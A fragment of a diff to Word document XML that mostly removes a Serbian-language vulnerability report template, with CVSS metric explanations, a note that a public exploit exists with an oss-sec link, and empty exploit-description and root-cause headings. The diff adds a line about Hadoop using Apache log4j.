-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>može</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>uticati</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>samo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>na</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>resurse</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>kojima</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>upravlja</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>isti</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>sigurnosni</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>autoritet</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. U </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>ovom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>slučaju</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>ranjiva</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>komponenta</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>pogođena</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>komponenta</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>su</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>ili</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>iste</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>ili</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>obe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>upravlja</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>isti</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>sigurnosni</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>autoritet</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">C:H- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>dolazi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> do </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>potpunog</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>gubitna</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>pouzdanosti</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">I:H- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>potpun</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>gubitak</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>intigriteta</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A:H- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>potpun</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>gubitak</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>dostupnosti</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">E:P- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>nije</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>exploiz</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-able pod </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>svim</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>uslovima</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> I u </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>svim</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>okruženjima</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">RL:O- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>postoji</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>resenje</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">RC:C- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>postoji</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> exploit code</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="9"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Opravdanje</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:pict w14:anchorId="1BAD80CF">
-          <v:rect id="_x0000_i1146" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Dostupnost</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>eksploita</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Postoji</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>javno</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>dostupan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>eksploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Da/Ne): Da</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:br/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Hadoop uses the </w:t>
       </w:r>
       <w:hyperlink r:id="rId12" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:val="en"/>
           </w:rPr>
-          <w:t>https://seclists.org/oss-sec/2017/q3/285</w:t>
+          <w:t>Apache log4j</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Opis</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>eksploita</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Kod</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>eksploita</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>ukoliko</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>postoji</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:pict w14:anchorId="6A333334">
-          <v:rect id="_x0000_i1147" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">4. Analiza </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>uzroka</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (root cause)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="11"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
